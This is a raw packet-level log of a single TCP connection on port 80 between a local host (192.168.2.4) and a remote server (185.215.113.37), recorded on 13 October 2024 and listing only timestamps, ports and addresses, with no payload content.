Oct 13, 2024 17:46:11.531980991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532021999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532033920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532044888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532141924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532141924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532144070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532161951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532172918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532182932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532193899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532196045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532207012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532218933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532228947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532258034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532258034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532263994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532309055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532309055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532310963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532324076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532335043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532382011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532382011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532433033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532443047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532449961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532459974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532476902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532486916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532497883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532530069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532530069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532543898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532555103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532561064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532569885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532588005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532612085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532618999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532624960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532629013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532629967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532638073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532644033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532705069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532720089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.532757044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532757998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.532804012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.554740906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.554897070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.554898024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.554908037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.554919958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.554933071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.555002928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.555002928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.555114031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.555140972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.555187941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.555187941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588398933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588501930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588514090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588525057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588535070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588546038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588556051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588562965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588562965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588628054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588655949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588675022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588685989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588707924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588711977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588720083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588731050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588741064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588743925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588774920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588793993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588840961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588851929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588862896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588872910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588882923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588893890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588897943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588906050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588915110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588932037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588942051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588952065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588953972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588965893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588968992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.588979006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.588994026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589020967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589027882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589027882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589061022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589071035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589078903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589113951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589123964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589128971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589128971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589137077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589149952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589169979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589205027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589220047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589231014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589241028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589241028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589241028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589253902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589266062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589277029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589298010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589298010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589329004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589340925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589343071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589354992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589442015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589484930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589497089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589508057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589519024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589529037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589549065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589570999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589629889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589637041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589648962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589658976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589670897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589680910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589692116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589692116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589726925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589730978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589741945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589745998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589757919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589767933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589780092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589787006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589791059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589802980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589823008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589862108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589873075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589883089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589894056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589904070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.589905977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589905977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589935064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.589960098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.590007067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590061903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.590075970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590086937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590096951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590125084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.590130091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590142965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590152979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590163946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.590163946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590176105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.590214968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.590239048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622596979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622616053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622627974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622667074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622700930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622711897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622723103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622734070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622744083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622744083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622751951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622762918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622775078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622817039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622817039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622886896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622905016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622916937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622927904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622937918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622955084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622956038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622967958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.622967958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622981071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.622992992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623003960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623013973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623018026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623018026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623025894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623047113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623053074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623056889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623065948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623070002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623080969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623097897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623095989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623111010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623121977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623131990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623143911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623143911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623158932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623191118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623191118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623262882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623275042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623297930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623303890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623308897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623317003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623322964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623328924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.623332024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623353004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.623413086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.678828955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678917885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678936958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678947926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678953886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.678957939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678970098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678982019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.678982019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.678994894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679006100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679025888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679038048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679047108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679055929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679064035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679068089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679086924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679086924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679112911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679121971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679125071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679136038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679167032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679177046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679186106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679187059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679186106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679217100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679236889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679255962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679265976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679275990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679280043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679280043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679280996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679289103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679300070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679305077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679325104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679352999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679373026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679373026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679394960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679414988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679424047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679424047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679425955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679469109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679469109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679478884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679485083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679490089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679501057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679511070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679539919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679539919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679569960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679580927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679590940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679600954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679605961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679630995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679630995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679651976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679655075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679747105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679757118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679766893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679781914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679807901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679820061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679820061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679826975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679837942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679848909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679853916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679861069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679864883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679876089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679904938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679909945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679909945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679915905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679959059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679971933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.679985046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.679996967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680008888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680018902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680030107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680061102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680066109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.680066109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.680072069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.680078983 CEST	80	49730	185.215.113.37	192.168.2.4
